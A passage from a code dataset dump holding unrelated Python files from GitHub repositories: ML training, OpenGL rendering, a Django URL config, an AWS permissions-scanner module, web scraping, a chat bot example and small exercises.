type=int)\nparser.add_argument('--lr', default=2e-5, type=float)\nparser.add_argument('--patience', default=7, type=int)\nparser.add_argument('--output_dir', default=\"saved_model\", type=str)\nparser.add_argument('--epoch_num', default=10, type=int)\n\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\ntorch.cuda.manual_seed(args.seed)\ntorch.cuda.manual_seed_all(args.seed)\nnp.random.seed(args.seed)\nrandom.seed(args.seed)\ntorch.cuda.set_device(args.gpu)\n\nprint(f'Training: random seed {args.seed}, experiment name: {args.name}, run on gpu {args.gpu}')\n\ndef train_model(model, train_dataloader, val_dataloader):\n    print(f'{args.name} start training...')\n    no_decay = [\"bias\", \"LayerNorm.weight\"]\n    weight_decay = 0\n    optimizer_grouped_parameters = [\n        {\n            \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n            \"weight_decay\": weight_decay,\n        },\n        {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], \"weight_decay\": 0.0},\n    ]\n    optimizer = torch.optim.AdamW(optimizer_grouped_parameters, lr=args.lr, eps=1e-8, weight_decay=0)\n    scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=0.1, patience=args.patience, threshold=1e-4, min_lr=1e-5)\n    early_stopping = EarlyStopping(patience = args.patience, verbose = True, path = f'{args.output_dir}/ckpt/best_model.pt')\n\n\n    train_losses = []\n    valid_losses = []\n    for epoch in trange(args.epoch_num):\n        print(f'Current Epoch: {epoch+1}')\n        model.train()\n        train_losses = train_epoch(train_dataloader, optimizer, model, \"train\")\n        model.eval()\n        with torch.no_grad():\n            valid_losses = train_epoch(val_dataloader, optimizer, model, \"valid\")\n        \n        train_loss = np.average(train_losses)\n        valid_loss = np.average(valid_losses)\n        \n        print(f'\\nEpoch {epoch+1}, train loss: {train_loss}, valid loss: {valid_loss}')\n        torch.save(model.state_dict(),f'./{args.output_dir}/ckpt/model_{epoch+1}.pt')\n        if (epoch+1 > 15): \n            early_stopping(valid_loss, model)\n            if early_stopping.early_stop:\n                print(f'Early stopping at epoch {epoch+1}')\n                break \n        scheduler.step(valid_loss)\n\ndef main():\n    print(f'Loading ids from {args.cleaned_path}...')\n    start = time.time()\n    profile_ids = load_pickle(f'{args.cleaned_path}/profile_ids_mini.pkl')\n    print(\"Loaded profile ids\")\n    query_ids = load_pickle(f'{args.cleaned_path}/q_ids_mini.pkl')\n    print(\"Loaded query ids\")\n    dialogue_ids = load_pickle(f'{args.cleaned_path}/dialog_ids_mini.pkl')\n    print(\"Loaded dialogue ids\")\n    end = time.time()\n    print(\"Total loading time: \", end-start, \"s\")\n    print('Data statistics:')\n    print(\"The length of profiles: \", len(profile_ids))\n    print(\"The length of queries: \", len(query_ids))\n    print(\"The length of dialogues: \", len(dialogue_ids))\n\n    print('Building training dataset and dataloader...')\n    train_set = pd.read_csv(f'./dataset/train_mini.csv', delimiter='\\t', encoding='utf-8', dtype={'dr_id': str})\n    train_dataset = DoctorRecDataset(\n        'train', train_set, profile_ids, query_ids, dialogue_ids,\n        dr_dialog_sample=args.dr_dialog_sample, neg_sample=args.neg_sample\n    )\n    train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True)\n    del train_set, train_dataset\n    print('Done')\n    \n    print('Building validation dataset and dataloader...')\n    valid_set = pd.read_csv(f'./dataset/valid_mini.csv', delimiter='\\t', encoding='utf-8', dtype={'dr_id': str})\n    val_dataset = DoctorRecDataset(\n        'valid', valid_set, profile_ids, query_ids, dialogue_ids,\n        
dr_dialog_sample=args.dr_dialog_sample, neg_sample=args.neg_sample\n )\n val_dataloader = DataLoader(val_dataset, batch_size=args.batch_size, shuffle=True)\n del valid_set, val_dataset, profile_ids, query_ids, dialogue_ids,\n print('Done')\n \n model = ourModel()\n model.cuda()\n\n train_model(model, train_dataloader, val_dataloader)\n\nif __name__ == '__main__':\n main()","repo_name":"ewayuan/DocRec","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3179616359","text":"from OpenGL.GL import *\r\nfrom OpenGL.GLUT import *\r\nfrom OpenGL.GLU import *\r\nimport sys\r\nimport png\r\n\r\nfrom math import *\r\nimport math\r\nimport random\r\n\r\ndist = 2\r\n\r\nside_count = 6\r\n\r\nwindow = 0\r\n\t\r\nheight = 1.8\r\n\r\nside_rads_size = (2*math.pi)/side_count\r\n\r\ndown_radius = 1.3\r\nup_radius = 0.5\r\ndown_vertices = []\r\nup_vertices = []\r\n\r\n\r\n\r\ncurrentRotationX = currentRotationY = currentRotationZ = 0.0\r\noffsetRotationX = 0.6\r\noffsetRotationY = 0.2\r\noffsetRotationZ = 0.4\r\n\r\ndef LoadTextures():\r\n\tglobal texture\r\n\ttexture = glGenTextures(2) \r\n\r\n\treader = png.Reader(filename='textura.png')\r\n\tw, h, pixels, metadata = reader.read_flat()\r\n\tif(metadata['alpha']):\r\n\t\tmodo = GL_RGBA\r\n\telse:\r\n\t\tmodo = GL_RGB\r\n\tglBindTexture(GL_TEXTURE_2D, texture[1])\r\n\tglPixelStorei(GL_UNPACK_ALIGNMENT,1)\r\n\tglTexImage2D(GL_TEXTURE_2D, 0, modo, w, h, 0, modo, GL_UNSIGNED_BYTE, pixels.tolist())\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)\r\n\tglTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)\r\n\tglTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)\r\n\r\ndef InitGL(Width, Height): \r\n\tLoadTextures()\r\n\tglEnable(GL_TEXTURE_2D)\r\n\tglClearColor(0.0, 0.0, 0.0, 0.0) \r\n\tglClearDepth(1.0)\r\n\tglDepthFunc(GL_LESS) \r\n\tglEnable(GL_DEPTH_TEST) \r\n\tglShadeModel(GL_SMOOTH) \r\n\tglMatrixMode(GL_PROJECTION)\r\n\tgluPerspective(45.0, float(Width)/float(Height), 0.1, 100.0)\r\n\tglMatrixMode(GL_MODELVIEW)\r\n\r\ndef ReSizeGLScene(Width, Height):\r\n\tif Height == 0: \r\n\t\tHeight = 1\r\n\tglViewport(0, 0, Width, Height) \r\n\tglMatrixMode(GL_PROJECTION)\r\n\tglLoadIdentity()\r\n\tgluPerspective(45.0, float(Width)/float(Height), 0.1, 100.0)\r\n\tglMatrixMode(GL_MODELVIEW)\r\n\r\ndef DrawGLScene():\r\n\tglobal currentRotationX, currentRotationY, currentRotationZ, texture, down_vertices, up_vertices\r\n\r\n\tglClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT) \r\n\tglLoadIdentity() \r\n\tglClearColor(0.5,0.5,0.5,1.0) \r\n\tglTranslatef(0.0,0.0,-5.0)\r\n\tglRotatef(currentRotationX,1.0,0.0,0.0)\r\n\tglRotatef(currentRotationY,0.0,1.0,0.0)\r\n\tglRotatef(currentRotationZ,0.0,0.0,1.0)\r\n\r\n\tglBindTexture(GL_TEXTURE_2D, texture[1])\r\n\tglBegin(GL_POLYGON)\r\n\r\n\t# Creating and drawing down vertices\r\n\tfor i in range(0,side_count):\r\n\t\tx = down_radius * math.cos(i*side_rads_size)\r\n\t\ty = down_radius * math.sin(i*side_rads_size)\r\n\t\tglTexCoord2f(math.cos(i), math.sin(i))\r\n\t\tdown_vertices += [ (x,y) ]\r\n\t\tglVertex3f(x,y,0.0)\r\n\tglEnd()\r\n\r\n\t# Creating and drawing up vertices\r\n\tglBegin(GL_POLYGON)\r\n\tfor i in range(0,side_count):\r\n\t\tx = up_radius * math.cos(i*side_rads_size)\r\n\t\ty = up_radius * 
math.sin(i*side_rads_size)\r\n\t\tglTexCoord2f(math.cos(i), math.sin(i))\r\n\t\tup_vertices += [ (x,y) ]\r\n\t\tglVertex3f(x,y,height)\r\n\tglEnd()\r\n\r\n\t#Drawing side faces\r\n\tglBegin(GL_QUADS)\r\n\tfor i in range(0,side_count):\r\n\t\tglTexCoord2f(0.0, 1.0); glVertex3f(down_vertices[i][0],down_vertices[i][1],0.0)\r\n\t\tglTexCoord2f(0.0, 0.0); glVertex3f(up_vertices[i][0],up_vertices[i][1],height)\r\n\t\tglTexCoord2f(1.0, 0.0); glVertex3f(up_vertices[(i+1)%side_count][0],up_vertices[(i+1)%side_count][1],height)\r\n\t\tglTexCoord2f(1.0, 1.0); glVertex3f(down_vertices[(i+1)%side_count][0],down_vertices[(i+1)%side_count][1],0.0)\r\n\tglEnd()\r\n \r\n\tcurrentRotationX = currentRotationX + offsetRotationX\r\n\tcurrentRotationY = currentRotationY + offsetRotationY\r\n\tcurrentRotationZ = currentRotationZ + offsetRotationZ\r\n\r\n\tglutSwapBuffers()\r\n\r\n\r\ndef main():\r\n\tglobal window\r\n\tglutInit(sys.argv)\r\n\tglutInitDisplayMode(GLUT_RGBA | GLUT_DOUBLE | GLUT_DEPTH)\r\n\tglutInitWindowSize(640, 480)\r\n\tglutInitWindowPosition(0, 0)\r\n\t\r\n\twindow = glutCreateWindow(\"Tronco de Pirâmide com a textura de pedras\")\r\n\r\n\tglutDisplayFunc(DrawGLScene)\r\n\tglutIdleFunc(DrawGLScene)\r\n\tglutReshapeFunc(ReSizeGLScene)\r\n\t\r\n\tInitGL(640, 480)\r\n\r\n\tglutMainLoop()\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()","repo_name":"gabrieldevsouza/ComputacaoGraficaCEFET-2","sub_path":"TroncoPiramidePedra/troncoPiramide_pedra.py","file_name":"troncoPiramide_pedra.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21601833875","text":"'''\n-------------------------------------------------------------------------------\nName:\t\t2.livehack_practice_solution2.py\nPurpose:\tDetermining if the triangle is a right angled\n\nAuthor:\tLi.H\n\nCreated:\t14/11/2019\n------------------------------------------------------------------------------\n'''\n# Receive the side lengths from the user\nside_1 = (int(input(\"Enter the length of Side 1: \")))\nside_2 = (int(input(\"Enter the length of Side 2: \")))\nside_3 = (int(input(\"Enter the length of Side 3: \")))\n\n# Calculate the formula\nside_1 = side_1**2\nside_2 = side_2**2\nside_3 = side_3**2\n\n# Calculate the possibilities\nif side_1 + side_2 == side_3:\n print(\"This is a right angled triangle\")\nelif side_1 + side_3 == side_2:\n print(\"This is a right angled triangle\")\nelif side_2 + side_3 == side_1:\n print(\"This is a right angled triangle\")\nelse:\n print(\"This is not a right angled triangle\")","repo_name":"StRobertCHSCS/fabroa-hugoli0903","sub_path":"Working/Practice Questions/2.livehack_practice_solution2.py","file_name":"2.livehack_practice_solution2.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42360238318","text":"from os import mkdir\nfrom os.path import isdir\n\nfrom dotenv import dotenv_values\nfrom boto3 import Session\n\nif __name__ == \"__main__\":\n\n config = dotenv_values()\n aws_session = Session(aws_access_key_id=config[\"AWS_ACCESS_KEY_ID\"],\n aws_secret_access_key=config[\"AWS_SECRET_ACCESS_KEY\"])\n\n s3 = aws_session.client(\"s3\")\n\n if not isdir(config[\"DATA_FOLDER\"]):\n mkdir(config[\"DATA_FOLDER\"])\n \n s3.download_file(config[\"S3_BUCKET_NAME\"],\n config[\"SOURCE_FILE\"],\n 
f\"./data/{config['DST_FILE']}\")","repo_name":"Peritract/xml-exploration","sub_path":"ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71570111207","text":"# ©️ The NextGuild Project 2023-present\n# If support is needed, you can join the support server (guilded.gg/nextguild) or raise an issue.\n# NOTICE: This example requires a external library, that is not endorsed or supported by The NextGuild Project.\n# CODE LEVEL // BEGINNER - Easy to follow\n# You can install the appropriate dependencies with the following commands in the terminal:\n# pip install nextguild\n# pip install random\n# pip install websockets\n# pip install requests\n\nfrom nextguild import *\nimport asyncio\nimport random\ntoken = \"YOUR_TOKEN_HERE\" # Replace with your bot's token\nbot = Client(token) # Define the 'bot' variable, and pass on the token to the client\nevents = Events(bot) # Define events and pass the 'bot' variable containing the client information to register and pass valid information to the Guilded API\n\n@events.on_message # Use the 'on_message' event to make a conditional usage\nasync def random_number(message): # Define the name of the function within the event and look specifically only from the messages section of the Guilded API\n if message.content == \"!random_number\": # Look if the message equals '!random_number'. If it does, do the code below this specific 'if' statement.\n bot.send_message(message.channel_id, f\"Here is your random number: {random.choice(range(1,101))}\") # The range is put until 101 because python generally does what we would do a 1-100 range to a 0-99 range. So, we have to add a 1 to the 100 so it becomes 0-100 when randomly generated via the random library.\nasyncio.run(events.run())\n","repo_name":"ArjunSharda/nextguild","sub_path":"examples/random_number.py","file_name":"random_number.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"37051628233","text":"#!/usr/bin/env python \n# coding=utf-8\n__author__ = 'Boaz'\n# @Time : 2019/4/3 17:34 \n\nimport trio\n\nasync def async_double(x):\n return 2 * x\n\nprint(trio.run(async_double, 3))","repo_name":"davidzhu1989/python-magic","sub_path":"Python-basic/异步爬虫/异步爬虫试试Trio吧/async_a.py","file_name":"async_a.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44128638898","text":"import argparse\nfrom mkr.benchmark import OpenedBookQABenchmark\nfrom mkr.resources.resource_manager import ResourceManager\nfrom mkr.retrievers.dense_retriever import DenseRetriever, DenseRetrieverConfig\nfrom mkr.question_answering.answer_extractor import AnswerExtractor, AnswerExtractorConfig\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--retriever_name\", type=str, default=\"mE5_small\")\n parser.add_argument(\"--extractor_name\", type=str, default=\"mRoBERTa\")\n args = parser.parse_args()\n\n # Check GPU available\n # Use PyTorch\n import torch\n print(f\"GPU available: {torch.cuda.is_available()}\")\n\n # Prepare models\n retriever = DenseRetriever(\n DenseRetrieverConfig(\n model_name=args.retriever_name,\n database_path=f\"./database/{args.retriever_name}\",\n ),\n )\n extractor = AnswerExtractor(AnswerExtractorConfig(model_name=args.extractor_name))\n\n # 
Prepare benchmark\n benchmark = OpenedBookQABenchmark(\n resource_management=ResourceManager(),\n retriever=retriever,\n extractor=extractor\n )\n benchmark.evaluate_on_datasets(\n [\"iapp_wiki_qa\", \"tydiqa\", \"xquad\"]\n )","repo_name":"panuthept/multilingual-knowledge-retrieval","sub_path":"eval_openedbook_qa.py","file_name":"eval_openedbook_qa.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"527690618","text":"from dataclasses import dataclass, field\nfrom typing import Dict, List, Optional\n\nfrom aws_ptrp.policy_evaluation import PolicyEvaluationApplyResult, PolicyEvaluationResult, PolicyEvaluationsResult\nfrom aws_ptrp.ptrp_allowed_lines.allowed_line_nodes_base import NodeBase, NodeNote, NodeNotesGetter, PoliciesNodeBase\nfrom aws_ptrp.ptrp_models.ptrp_model import AwsPtrpNodeNote\nfrom aws_ptrp.services import MethodOnStmtActionsResultType, MethodOnStmtActionsType\n\n\n@dataclass\nclass NodeNotes:\n node_notes: List[NodeNote] = field(default_factory=list)\n\n def extend(self, other: 'NodeNotes'):\n self.node_notes.extend(other.node_notes)\n\n def add_node_note(self, node_note: NodeNote):\n self.node_notes.append(node_note)\n\n def get_node_notes(self) -> List[NodeNote]:\n return self.node_notes\n\n def get_aws_ptrp_node_notes(self) -> List[AwsPtrpNodeNote]:\n return [node_note.to_ptrp_node_note() for node_note in self.node_notes]\n\n\n@dataclass\nclass NodesNotes(NodeNotesGetter):\n nodes_notes: Dict[NodeBase, NodeNotes] = field(default_factory=dict)\n\n def extend(self, other: 'NodesNotes'):\n for other_node_base, other_node_notes in other.nodes_notes.items():\n node_notes: Optional[NodeNotes] = self.nodes_notes.get(other_node_base)\n if node_notes:\n node_notes.extend(other_node_notes)\n else:\n self.nodes_notes[other_node_base] = other_node_notes\n\n # NodeNotesGetter\n def get_node_notes(self, node_base: NodeBase) -> List[NodeNote]:\n node_notes = self.nodes_notes.get(node_base)\n if node_notes:\n return node_notes.get_node_notes()\n return []\n\n def get_aws_ptrp_node_notes(self, node_base: NodeBase) -> List[AwsPtrpNodeNote]:\n node_notes = self.nodes_notes.get(node_base)\n if node_notes:\n ret = node_notes.get_aws_ptrp_node_notes()\n ret.sort()\n return ret\n return []\n\n\ndef _update_nodes_notes(\n nodes_notes: NodesNotes,\n policy_apply_result: PolicyEvaluationApplyResult,\n service_name: str,\n principal_policies_node_base: PoliciesNodeBase,\n target_node_base: NodeBase,\n resource_node_note: NodeBase,\n):\n # For each resolved_stmt in the policy evaluation result, explicit deny result: check if there are stmt with Deny + condition\n for (\n resolved_stmt,\n method_on_stmt_actions_result_type,\n ) in policy_apply_result.explicit_deny_result.yield_resolved_stmts(\n MethodOnStmtActionsType.DIFFERENCE,\n list(\n [\n MethodOnStmtActionsResultType.IGNORE_METHOD_DIFFERENCE_CONDITION_EXISTS,\n MethodOnStmtActionsResultType.IGNORE_METHOD_DIFFERENCE_WITH_S3_NOT_RESOURCE_OBJECT_REGEX,\n ]\n ),\n ):\n # build the node note params\n stmt_name = f\"statement '{resolved_stmt.stmt_name}' in \" if resolved_stmt.stmt_name else ''\n policy_name = (\n f\"policy '{resolved_stmt.policy_name}'\"\n if resolved_stmt.policy_name\n else f\"policy of {resolved_stmt.stmt_parent_arn}\"\n )\n attached_to_other_node_arn = \"\"\n node_base_to_add: Optional[NodeBase] = None\n\n # lookup the relevant node to add the note\n # first, check the target node base (prior to the resource node / identity 
policies nodes)\n if target_node_base.get_node_arn() == resolved_stmt.stmt_parent_arn and (\n # if there is policy name, compare it\n resolved_stmt.policy_name is None\n or resolved_stmt.policy_name == target_node_base.get_node_name()\n ):\n node_base_to_add = target_node_base\n elif resource_node_note.get_node_arn() == resolved_stmt.stmt_parent_arn:\n node_base_to_add = resource_node_note\n else:\n # check if the resolved_stmt coming from inline policy or attached iam policy (which doesn't appear as a node in the allowed line nodes)\n for inline_policy_ctx in principal_policies_node_base.get_inline_policies_ctx():\n if inline_policy_ctx.parent_arn == resolved_stmt.stmt_parent_arn:\n node_base_to_add = principal_policies_node_base\n # if the arn of the node is not the same as the inline policy arn (can happen for iam user that attached to iam group which has inline policy)\n if principal_policies_node_base.get_node_arn() != inline_policy_ctx.parent_arn:\n attached_to_other_node_arn = f\" ({resolved_stmt.stmt_parent_arn})\"\n break\n if node_base_to_add is None:\n for attached_policy_arn in principal_policies_node_base.get_attached_policies_arn():\n if attached_policy_arn == resolved_stmt.stmt_parent_arn:\n attached_to_other_node_arn = f\" ({resolved_stmt.stmt_parent_arn})\"\n node_base_to_add = principal_policies_node_base\n break\n\n if node_base_to_add:\n node_notes = nodes_notes.nodes_notes.setdefault(node_base_to_add, NodeNotes())\n note = NodeNote.from_stmt_info_and_action_stmt_result_type(\n stmt_name, policy_name, attached_to_other_node_arn, service_name, method_on_stmt_actions_result_type\n )\n if note:\n node_notes.add_node_note(note)\n\n\ndef get_nodes_notes_from_target_policy_resource_based(\n policy_evaluations_result: PolicyEvaluationsResult,\n service_name: str,\n principal_policies_node_base: PoliciesNodeBase,\n target_node_base: NodeBase,\n resource_node_note: NodeBase,\n) -> NodesNotes:\n nodes_notes = NodesNotes()\n policy_apply_result = policy_evaluations_result.get_policy_apply_result()\n if policy_apply_result:\n _update_nodes_notes(\n nodes_notes=nodes_notes,\n policy_apply_result=policy_apply_result,\n service_name=service_name,\n principal_policies_node_base=principal_policies_node_base,\n target_node_base=target_node_base,\n resource_node_note=resource_node_note,\n )\n policy_apply_result_cross_account = policy_evaluations_result.get_cross_account_policy_apply_result()\n if policy_apply_result_cross_account:\n _update_nodes_notes(\n nodes_notes=nodes_notes,\n policy_apply_result=policy_apply_result_cross_account,\n service_name=service_name,\n principal_policies_node_base=principal_policies_node_base,\n target_node_base=target_node_base,\n resource_node_note=resource_node_note,\n )\n return nodes_notes\n\n\ndef get_nodes_notes_from_target_policies_identity_based(\n policy_evaluation_result: PolicyEvaluationResult,\n service_name: str,\n principal_policies_node_base: PoliciesNodeBase,\n target_node_base: NodeBase,\n resource_node_note: NodeBase,\n) -> NodesNotes:\n policy_apply_result = policy_evaluation_result.get_policy_apply_result()\n nodes_notes = NodesNotes()\n if policy_apply_result:\n _update_nodes_notes(\n nodes_notes=nodes_notes,\n policy_apply_result=policy_apply_result,\n service_name=service_name,\n principal_policies_node_base=principal_policies_node_base,\n target_node_base=target_node_base,\n resource_node_note=resource_node_note,\n )\n return nodes_notes\n\n\ndef get_nodes_notes_from_identity_center_user(\n target_node_base: NodeBase,\n 
identity_center_instance_arn: str,\n identity_center_account_id: str,\n identity_center_region: str,\n) -> NodesNotes:\n nodes_notes = NodesNotes()\n note = NodeNote.from_user_and_identity_center_instance_info(\n target_node_base.get_node_name(),\n identity_center_instance_arn,\n identity_center_account_id,\n identity_center_region,\n )\n nodes_notes.nodes_notes.setdefault(target_node_base, NodeNotes()).add_node_note(note)\n return nodes_notes\n","repo_name":"SatoriCyber/universal-data-permissions-scanner","sub_path":"universal_data_permissions_scanner/datastores/aws/aws_ptrp_package/aws_ptrp/ptrp_allowed_lines/allowed_line_node_notes.py","file_name":"allowed_line_node_notes.py","file_ext":"py","file_size_in_byte":8007,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"31589327637","text":"from bs4 import BeautifulSoup\nimport requests\n# scrape and print India covid data (cases, deaths and recoviers)\n\ndef main():\n URL = \"https://www.worldometers.info/coronavirus/country/india\"\n webpage = requests.get(URL)\n content = BeautifulSoup(webpage.content, \"html.parser\")\n elements = content.find_all(\"div\", class_=\"maincounter-number\")\n for element in elements:\n value = element.find(\"span\")\n print(value.text.strip())\n\nif __name__ == \"__main__\":\n main()","repo_name":"John-Ling/Covid-Companion","sub_path":"tests/scrape_test.py","file_name":"scrape_test.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16701595307","text":"\"\"\"eengineDjango URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom frontend import views\nfrom frontend.forms import BootstrapAuthenticationForm\nimport datetime\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$', views.index, name='index'), \n url(r'^opscen', views.opscen, name='opscen'), \n url(r'^user_list', views.user_list, name='user_list'), \n\n url(r'^contact', views.contact, name='contact'), \n url(r'^logout', views.logout, name='logout'), \n url(r'^search', views.search, name='search'), \n \n url(r'^cancel_order' , views.cancel_order, name='cancel_order'), \n url(r'^close_position' , views.close_position, name='close_position'), \n url(r'^get_trading_data', views.get_trading_data, name='get_trading_data'), \n\n url(r'^horizon_scanning', views.horizon_scanning, name='horizon_scanning'), \n url(r'^processLogin', views.processLogin, name='processLogin'), \n url(r'^login',\n 'django.contrib.auth.views.login',\n {\n 'template_name': 'frontend/login.html',\n 'authentication_form': BootstrapAuthenticationForm,\n 'extra_context':\n {\n 'title':'Log in',\n 'year':datetime.datetime.now().year,\n }\n },\n name='login'), \n]\n","repo_name":"TMda/MyAlgoSystem","sub_path":"MyAlgoDjango/MyAlgoDjango/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17300494221","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom apps.core import utils\nfrom apps.core.db.models import (ImageModelMixin, InfoMixin, SlugMixin,\n TimestampMixin, UUIDMixin)\nfrom apps.developers.models import Profile\n\nfrom .choices import VoteType\n\n\nclass Project(UUIDMixin, InfoMixin, SlugMixin, TimestampMixin, ImageModelMixin):\n POSITIVE = \"Positive\"\n NEGATIVE = \"Negative\"\n VOTE = \"Vote\"\n VOTES = \"Votes\"\n IMAGE_URL = \"/static/images/default.jpg\"\n\n owner = models.ForeignKey(Profile, on_delete=models.CASCADE, related_name=\"projects\", null=True, blank=True)\n source_link = models.URLField(null=True, blank=True, verbose_name=_(\"Source Link\"))\n demo_link = models.URLField(null=True, blank=True, verbose_name=_(\"Demo Link\"))\n votes = models.IntegerField(default=0, verbose_name=_(\"Votes\"))\n vote_ratio = models.IntegerField(default=0, verbose_name=_(\"Votes Ratio\"))\n tags = models.ManyToManyField(\n \"projects.Tag\",\n null=True,\n blank=True,\n verbose_name=_(\"Tags\"),\n related_name=\"projects\",\n ) # 'app_label.ModelName'\n\n def __str__(self):\n return self.title\n\n class Meta:\n ordering = [\"-created\"]\n verbose_name = \"Project\"\n verbose_name_plural = \"Lean Projects\"\n\n def tags_list(self):\n return utils.from_qs_to_list(self.tags.all())\n\n @property\n def feedback(self):\n if self.vote_ratio >= 50:\n return self.POSITIVE\n return self.NEGATIVE\n\n def pluralize(self):\n if self.votes > 1:\n return self.VOTES\n return self.VOTE\n\n\nclass Review(UUIDMixin, TimestampMixin, models.Model):\n # owner\n\n proj = models.ForeignKey(\n Project,\n on_delete=models.CASCADE,\n related_name=\"reviews\",\n verbose_name=_(\"Project\"),\n )\n # on_delete ==> what you will do with children if parent deleted ?\n body = models.TextField(null=True, blank=True, verbose_name=_(\"Body\"))\n value = models.CharField(\n max_length=256,\n choices=VoteType.choices,\n verbose_name=_(\"Value\"),\n default=VoteType.UP,\n )\n\n def __str__(self):\n 
return self.body[:30]\n\n def project(self):\n return self.proj\n\n def content(self):\n if self.body:\n return self.body[:30]\n return \"-\"\n\n\nclass Tag(UUIDMixin, TimestampMixin, models.Model):\n name = models.CharField(max_length=256, verbose_name=_(\"Name\"))\n\n def __str__(self):\n return self.name\n\n def projects_list(self):\n return utils.from_qs_to_list(self.projects.all())\n","repo_name":"NagahShinawy/devsearch","sub_path":"apps/projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30297915167","text":"from bs4 import BeautifulSoup\nfrom colorama import init, Fore, Back, Style\n\ndef hex_to_bash_color(hex_color:str):\n \"\"\"Converts hex color to bash color\n \"\"\"\n hex_color = hex_color.replace(\"#\", \"\")\n r, g, b = tuple(int(hex_color[i:i+2], 16) for i in (0, 2, 4))\n return f\"\\033[38;2;{r};{g};{b}m\"\n\n# initialize colorama\ninit()\n\n# Open ascii file with html version of the image\nascii = open(\"ascii.html\")\nasciitxt = ascii.read()\nascii.close()\n\n# Analyze text from the ascii\nsoup = BeautifulSoup(asciitxt, 'html.parser')\nelements = soup.find_all([\"span\", \"br\"])\n\n# Initialize variables used in the loop\ntext = \"\" # Output text\nmaxline_length = 0 # Max line length (in content) in the ascii art\nlinelen = 0 # Line length, auxisliary variable\nsium = False\nfor element in elements:\n if element.name == \"span\":\n span = element\n try:\n # Get the color from the element\n color = span[\"style\"].split(':')[1]\n text += hex_to_bash_color(color.replace(\"#\", \"\")) # Convert the color to bash color and append it to the text\n text += span.text # Write span content and append it to text\n linelen += len(span.text) # Increase line length\n if linelen > maxline_length: # Update maxline_length variable\n maxline_length = linelen\n except Exception as e:\n print(e)\n elif element.name == \"br\": # New line\n text += \"\\n\"\n linelen = 0 # Reset line length\nprint(text) # print result\n\nleng = 0 # Find the longest line (not content)\nfor line in text.split(\"\\n\"):\n if leng < len(line):\n leng = len(line)\n\n# Calculate and print neofetch gap\ngap = leng-maxline_length\nprint(\"To use the ascii execute the command\", \"neofetch --ascii output --gap '-{}'\".format(gap))\n\n# Save the file\nout = open(\"output\", \"w+\")\nout.write(text)\nout.close()\n\n","repo_name":"FrancescoCaracciolo/neofetch-ascii-generator-image","sub_path":"create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37859798445","text":"import pygame as pg\n\n\nclass BarreVie:\n\n def __init__(self, pokemon, x_y, ecran, longueur):\n self.ecran = ecran\n self.pokemon = pokemon\n self.longueur = longueur\n self.x_y = x_y\n self.rectangle_max = pg.Rect(x_y[0], x_y[1], self.longueur, 20)\n self.rectangle_actuel = pg.Rect(x_y[0], x_y[1], self.longueur, 20)\n self.rectangle_fond = pg.Rect(x_y[0] - 10, x_y[1] - 70, self.longueur + 20, 100)\n self.font = pg.font.SysFont(\"comicsansms\", 20)\n\n def maj(self):\n pg.draw.rect(self.ecran, (255, 255, 255), self.rectangle_fond)\n self.ecran.blit(self.font.render(self.pokemon.nom, True, (0, 0, 0)), (self.x_y[0], 